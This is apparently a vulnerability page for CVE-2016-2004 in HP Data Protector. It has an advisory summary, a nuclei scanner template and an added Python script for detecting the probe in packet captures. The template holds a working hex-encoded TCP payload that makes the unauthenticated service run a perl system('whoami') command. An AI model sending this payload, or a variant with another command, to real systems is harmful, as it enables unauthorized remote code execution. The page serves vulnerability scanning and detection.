HP Data Protector Arbitrary Command Execution Vulnerability

Vulnerability Information

Vulnerability name: HP Data Protector Arbitrary Command Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2016-2004

Vulnerability type: Command execution

Severity: Critical

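Description: HP Data Protector is an enterprise data backup and recovery solution, widely used by organizations of all sizes to protect critical data against loss or corruption. Many organizations rely on it for its powerful features and reliability. The vulnerability allows an attacker to execute arbitrary code via unspecified vectors, and it results from an incomplete fix for CVE-2014-2623. Specifically, the root cause is the lack of a proper authentication mechanism, which lets an attacker bypass security measures and interact directly with the Data Protector service. Exploitation may allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account, thereby taking full control of the system, accessing sensitive data, and even penetrating further into the internal enterprise network. Because this is a remote code execution vulnerability that can be exploited without user interaction, its severity is extremely high. Organizations should upgrade to the latest version of HP Data Protector immediately to protect against this vulnerability.

Vendor: HP

Product name: Data Protector

Affected versions: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details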

id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

tcp:
  - host:
      - "{{Hostname}}"

    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex

    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950
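
Added example (not part of the nuclei template or the original page): a defender-side Python check that splits a captured TCP payload into frames and flags the template's request and response when they appear in a capture. The 4-byte big-endian length prefix and the NUL-separated fields are assumptions inferred from the template bytes (0x34 = 52 matches both body lengths), the function names are hypothetical, and the benign frame is constructed.

```python
import struct

# Request and response bytes copied from the template's inputs and matchers.
PROBE_REQUEST = bytes.fromhex(
    "00000034320001010101010100010001000100010100203238005c7065726c2e"
    "65786500202d6573797374656d282777686f616d69272900")
PROBE_RESPONSE = bytes.fromhex(
    "00000034fffe3900000020006e007400200061007500740068006f0072006900"
    "740079005c00730079007300740065006d000a0000000000")
# Constructed benign frame for contrast (not real Data Protector traffic).
_body = b"2\x00status\x00ok\x00"
BENIGN_FRAME = struct.pack(">I", len(_body)) + _body

def split_frames(stream):
    """Split a payload into bodies: 4-byte big-endian length, then body (assumed framing)."""
    frames, off = [], 0
    while off + 4 <= len(stream):
        (n,) = struct.unpack_from(">I", stream, off)
        body = stream[off + 4: off + 4 + n]
        if len(body) < n:  # truncated capture: stop rather than guess
            break
        frames.append(body)
        off += 4 + n
    return frames

def decode_fields(body):
    """Decode as UTF-16LE when a BOM leads the body, else Latin-1; split on NUL."""
    if body[:2] == b"\xff\xfe":
        text = body[2:].decode("utf-16-le", errors="replace")
    else:
        text = body.decode("latin-1")
    return [f.strip() for f in text.split("\x00") if f.strip()]

def classify(body):
    """Label one frame body using the two indicators present in the template."""
    fields = [f.lower() for f in decode_fields(body)]
    for i, field in enumerate(fields):
        if field.endswith("perl.exe") and any(a.startswith("-e") for a in fields[i + 1:]):
            return "request: perl one-liner"
    if "nt authority\\system" in fields:
        return "response: SYSTEM identity"
    return "unremarkable"

def scan(stream):
    """Classify every complete frame in a captured payload."""
    return [classify(body) for body in split_frames(stream)]
```

Decoding the matcher shows the expected response body is UTF-16LE text reading `nt authority\system`, so the template treats a `whoami` result of SYSTEM as proof of unauthenticated execution.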


http://example.com/2025/07/08/github_884873307/
Author: lianccc
Published: July 8, 2025